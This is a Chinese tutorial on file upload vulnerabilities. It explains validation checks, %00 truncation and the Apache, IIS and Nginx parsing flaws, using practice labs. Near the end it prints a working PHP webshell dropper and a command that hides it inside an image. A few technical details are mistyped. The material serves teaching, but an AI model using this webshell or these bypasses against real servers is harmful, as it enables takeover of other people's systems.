WEB漏洞-文件上传(一)

本文涉及的产品
公共DNS(含HTTPDNS解析),每月1000万次HTTP解析
云解析 DNS,旗舰版 1个月
全局流量管理 GTM,标准版 1个月
简介: WEB漏洞-文件上传



什么是文件上传漏洞?

文件上传漏洞是web安全中经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞。

危害

上传漏洞与SQL注入或 XSS相比 , 其风险更大 , 如果 Web应用程序存在上传漏洞 , 攻击者上传的文件是Web脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码执行。如果上传的文件是Flash的策略文件crossdomain.xml,黑客用以控制Flash在该域下的行为。如果上传的文件是病毒、木马文件,黑客用以诱骗用户或者管理员下载执行。如果上传的文件是钓鱼图片或为包含了脚本的图片,在某些版本的浏览器中会被作为脚本执行,被用于钓鱼和欺诈。甚至攻击者可以直接上传一个webshell到服务器上 完全控制系统或致使系统瘫痪。

原理

大部分的网站和应用系统都有上传功能,而程序员在开发任意文件上传功能时,并未考虑文件格式后缀的合法性校验或者是否只在前端通过js进行后缀检验。这时攻击者可以上传一个与网站脚本语言相对应的恶意代码动态脚本,例如(jsp、asp、php、aspx文件后缀)到服务器上,从而访问这些恶意脚本中包含的恶意代码,进行动态解析最终达到执行恶意代码的效果,进一步影响服务器安全。

文件上传漏洞如何查找及判断?

文件上传漏洞有哪些需要注意的地方?

关于文件上传漏洞在实际应用中的说明?

配合解析漏洞下的文件类型后门测试

使用vulhub靶场 演示nginx解析漏洞

    [root@halo ~ ]# cd vulhub-master
    [root@halo vulhub-master ]# cd nginx/nginx_parsing_vulnerability/
    [root@halo nginx_parsing_vulnerability ]# docker-compose 丿-d

    URL后面添加 /.php 执行phpinfo函数

    搭建本地靶场

    https://github.com/c0ny1/upload-labs

    上传php文件 提示格式不对

    把test.php  改成test.png burp抓包 对文件头进行更改

    640.png

    上传成功  浏览器访问


    文件上传常见验证

    后缀名,类型,文件头等

    后缀名:黑名单,白名单

    文件类型:MIME信息

    文件头:内容头信息

    服务端内容检测绕过:

    通过在文件中添加正常文件的标识或其他关键字符绕过

    类型
    标识
    JPEG
    头标识 ff d8 结束标识 ff d9
    PNG 头标识 89 50 4E 0D 0A 1A 0A
    GIF
    头标识 47 49 46 38 39 61 6bytes
    BMP
    头标识 2bytes 42 40 BM

    白名单与黑名单验证

    (1)黑名单过滤方式

    黑名单过滤是一种不安全的方式,黑名单定义了一系列不安全的扩展名,服务器端在接收文件后,与黑名单扩展名对比,如果发现文件扩展名与黑名单里的扩展名匹配,则认为文件不合法。

    (2)白名单过滤方式

    白名单的过滤方式与黑名单恰恰相反,黑名单是定义不允许上传的文件扩展名,而白名单则是定义允许上传的扩展名,白名单拥有比黑名单更好的防御机制。如:$WhiteList=

    array(rar’,jpg’,png,bmpy,gif,jpg;doc);在获取到文件扩展名后对 WhiteList数组里的扩展名迭代判断,如果文件扩展名被命中,程序将认为文件是合法的,否则不允许上传。

    MIME验证

    MIME类型用来设定某种扩展名文件的打开方式,当具有该扩展名的文件被访问时,浏览器会自动使用指定的应用程序来打开。如GIF图片MIME为image/gif,CSS文件MIME类型为text/ess。

    目录验证

    在文件上传时,程序通常允许用户将文件放到指定的目录中,然而有些Web开发人员为了让代码更“健壮”,通常会做一个操作,如果指定的目录存在,就将文件写入目录中,不存在则先建立目录,然后写入。

    截断上传攻击

    文件名后缀有一个%00字节,可以截断某些函数对文件名的判断。在许多语言函 数中,处理字符串的函数中0x00被认为是终止符

    例如: 网站上传函数处理xxx.asp%00.jpg时,首先后缀名是合法的jpg格式,可以 上传,在保存文件时,遇到%00字符丢弃后面的 .jpg,文件后缀最终保存的后缀 名为xxx.asp

    服务器解析漏洞:

    Apache解析漏洞:

    Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如test.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php。

    若一个文件名abc.x1.x2.x3,Apache会从x3开始解析,如果x3不是一个能解析的扩展名,就往前解析x2以此往复,直到能遇到一个能解析的文件名为止。

    IIS解析漏洞:

    在test.asp/ jkl , IIS 的某些版本中会直接当成asp来解析; test.asp;jkl ,IIS某些版本也会按照asp 来解析;任意文件名/任意文件名.php,IIS 某些版本会直接当php来解析。

    IIS6.0 在解析 asp 时有两个解析漏洞,一个是如果任意目录名包含 .asp 字符串,那么这个目录下的所有文件 都会按照 asp 去解析,另一个是文件名中含有 asp; 就会优先当作 asp 来解析。

    IIS7.0/7.5 对php解析有所类似于 Nginx 的解析漏洞。只要对任意文件名在url后面追加上 字符串 / 任意文件名.php 就会按照php去解析。

    例如,上传test.jpg,然后访问test.jpg/.php或test.jpg/abc.php当前目录下就会生成一句话木马 shell.php

    Nginx解析漏洞:

    将shell语句,如<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>’);?>

    写在文本xx.txt中(或者shell语句直接写一句话木马,用菜刀、cknife等直连,只是容易被查杀),然后用命令将shell语句附加在正常图片xx.jpg后copy xx.jpg/b + xx.txt/a test.jpg

    上传test.jpg,然后访问test.jpg/.php或test.jpg/abc.php当前目录下就会生成一句话木马 shell.php 。

    相关文章
    |
    1月前
    |
    缓存 移动开发 安全
    Web安全-HTTP响应拆分(CRLF注入)漏洞
    Web安全-HTTP响应拆分(CRLF注入)漏洞
    90 1
    |
    2月前
    |
    安全 关系型数据库 MySQL
    Web安全-条件竞争漏洞
    Web安全-条件竞争漏洞
    48 0
    |
    2月前
    |
    缓存 移动开发 安全
    Web安全-HTTP响应拆分(CRLF注入)漏洞
    Web安全-HTTP响应拆分(CRLF注入)漏洞
    149 8
    |
    2月前
    |
    安全 关系型数据库 Shell
    Web安全-浅析CSV注入漏洞的原理及利用
    Web安全-浅析CSV注入漏洞的原理及利用
    131 3
    |
    2月前
    |
    安全 应用服务中间件 开发工具
    Web安全-SVN信息泄露漏洞分析
    Web安全-SVN信息泄露漏洞分析
    177 2
    |
    2月前
    |
    JSON 安全 JavaScript
    Web安全-JQuery框架XSS漏洞浅析
    Web安全-JQuery框架XSS漏洞浅析
    391 2
    |
    2月前
    |
    安全 搜索推荐 应用服务中间件
    Web安全-目录遍历漏洞
    Web安全-目录遍历漏洞
    78 2
    |
    2月前
    |
    安全 关系型数据库 MySQL
    Web安全-任意文件下载漏洞
    Web安全-任意文件下载漏洞
    104 5
    |
    2月前
    |
    XML JSON 安全
    Web安全-XXE漏洞
    Web安全-XXE漏洞
    24 1
    |
    2月前
    |
    开发框架 安全 .NET
    Web安全-文件上传漏洞与WAF绕过
    Web安全-文件上传漏洞与WAF绕过
    160 4

    热门文章

    最新文章